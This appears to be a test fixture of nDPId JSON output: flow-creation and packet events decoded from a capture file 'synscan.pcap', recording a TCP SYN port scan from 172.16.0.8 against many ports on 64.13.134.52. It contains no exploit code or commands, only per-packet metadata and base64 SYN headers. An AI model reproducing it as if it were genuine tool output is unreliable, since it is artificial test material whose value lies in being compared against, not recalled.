-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsgTgAADcGkDqsEAAIQA2GNIzSArzdUoMYAAAAAGACEAAl0wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAs5cUAADMGL62sEAAIQA2GNIzSFXzdUoMYAAAAAGACEAATEwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAshYIAADMGj\/CsEAAIQA2GNIzSgA3dUoMYAAAAAGACEACogQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsj7IAADkGf8CsEAAIQA2GNIzTBDzdU4MZAAAAAGACCAAsUAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsoJUAACkGft2sEAAIQA2GNIzTFEbdU4MZAAAAAGACCAAcRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAscMAAAC8GqLKsEAAIQA2GNIzTGoTdU4MZAAAAAGACEAAOCAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsna4AAC0GfcSsEAAIQA2GNIzTH23dU4MZAAAAAGACCAARHwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsUPgAADsGvHqsEAAIQA2GNIzTFTfdU4MZAAAAAGACEAATVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsylkAACUGWRmsEAAIQA2GNIzTD2ndU4MZAAAAAGACCAAhIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsiKIAACsGlNCsEAAIQA2GNIzTLr\/dU4MZAAAAAGACEAD5zAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0AAADoGRzKsEAAIQA2GNIzTIGzdU4MZAAAAAGACDAAMIAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMQAADQGS66sEAAIQA2GNIzTw0\/dU4MZAAAAAGACBABxPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsS0MAADgGxS+sEAAIQA2GNIzTBJ\/dU4MZAAAAAGACBAAv7QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAslLUAACwGh72sEAAIQA2GNIzTrJDdU4MZAAAAAGACBACH+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAs7LUAACsGML2sEAAIQA2GNIzSFF7dUoMYAAAAAGACEAAUMQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVm4AADkGuQSsEAAIQA2GNIzSABHdUoMYAAAAAGACCAAwfgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsYdQAACsGu56sEAAIQA2GNIzSGivdUoMYAAAAAGACEAAOZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GMAADEGIw+sEAAIQA2GNIzSDubdUoMYAAAAAGACCAAhqQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtkAADYG85msEAAIQA2GNIzSX3zdUoMYAAAAAGACDADNEgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAslyIAACUGjFCsEAAIQA2GNIzSABrdUoMYAAAAAGACCAAwdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVt0AADIGv5WsEAAIQA2GNIzSDSndUoMYAAAAAGACDAAfZgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/FUAADMGGR2sEAAIQA2GNIzSCU7dUoMYAAAAAGACEAAfQQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsoxcAACkGfFusEAAIQA2GNIzSAprdUoMYAAAAAGACCAAt9QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtAAADkG0KKsEAAIQA2GNIzSBNzdUoMYAAAAAGACCAArswAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDHcAADUGBvysEAAIQA2GNIzSC+zdUoMYAAAAAGACCAAkowAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 